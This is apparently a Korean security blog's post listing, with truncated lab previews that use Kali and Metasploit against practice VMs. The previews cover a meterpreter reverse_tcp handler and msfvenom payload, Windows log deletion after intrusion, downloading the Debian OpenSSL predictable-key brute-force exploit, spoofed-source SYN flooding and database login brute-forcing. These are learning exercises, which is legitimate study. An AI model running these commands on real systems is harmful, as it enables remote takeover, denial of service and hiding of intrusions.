목록전체 글 (553)
Self-Improvement
*윈도우 2008 로그 삭제 Attacker : Kali Victim : Windows 2008 R2 사전에 Widows 2008 R2에 침입이 가능하다는 전제가 필요하다. *실습 (kali) #cd /root/bin #vi reverse_resource2.rc use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.20.50 set ExitSession false exploit -j -z ※msfconsole의 -r옵션인 리소스로 사용하기위해 사전 생성 #msfconsole -r reverse_resource2.rc (해당 터미널은 있고 새로운 터미널로 진행) #msfvenom -p window..
*meterpreter를 이용한 Reverse_TCP 공격 bind_TCP : 타겟이 공인IP로 되어있는 경우에(서버) Attacker가 해당 타겟에 붙는 것 reverse_TCP : 타겟이 사설IP로 되어있는 경우에(PC) Attacker가 항상 구동중인 상태의 서버로 타겟이 Attacker에 붙는 것 Attacker : Kali Victim : Windows 7 ※메터프리터는 상대 OS별로 사용할 수 있는 명령어를 제공 한다. *msfvenom msfvenom은 Metasploit의 페이로드를 파일 형식으로 만들어줌 *실습 (kali) #mkdir -p /root/bin #cd /root/bin #vi reverse_resource.rc (msfconsole의 리소스 형식으로 할 예정) use exp..
*Debian OpenSSL Predictable PRNG Brute Force SSH Attacker : Kali Victim : Metasploitable cve-2008-0166 Dabian 기반의 OS에 OpenSSL 0.9.8c-1 ~ 0.9.8g-9 버전까지 가능하며 예측가능한 숫자들을 가지고 Brute Force 하는 것 *실습 (kali) #mkdir -p /root/bin && cd /root/bin #wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 #tar jxvf 5622.tar.bz2 (Public와 상응하는 Private을 만들어냄) ex..
*TCP Syn Flooding 연결시 3Way-Handshake 방식에서 마지막 Ack을 보내지 않고 Syn만 보내는 것 ※Syn을 보내면 Ack,Syn을 받게됨으로 공격자도 부하량 걸리게 됨으로 Source IP를 바꿔서 보낸다. *실습 시나리오 : kali가 WebServer인 linux에 TCP Syn Flooding 공격을 함 (linux) ※사전에 WebServer로 작동되어야함 #mkdir /var/www/html/test #vi /var/www/html/test/index.html #firefox localhost/test & (win2008) 웹페이지 192.168.20.200/test 접속해서 작동되는지 확인하기 (kali) #wireshark & ※postgresql을 사용해야함으로 ..
*DB종류 msf 모듈 위치 MySQL : auxiliary/scanner/mysql/mysql_login MSSQL : auxiliary/scanner/mssql/mssql_login Oracle : auxiliary/scanner/oracle/oracle_login PostgreSQL : auxiliary/scanner/postgres/postgres_login *MySQL DB 실습 (kali) #nmap -sV 192.168.10.134 #msfconsole msf > search mysql_logind msf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > show options msf auxiliary(mysql_l..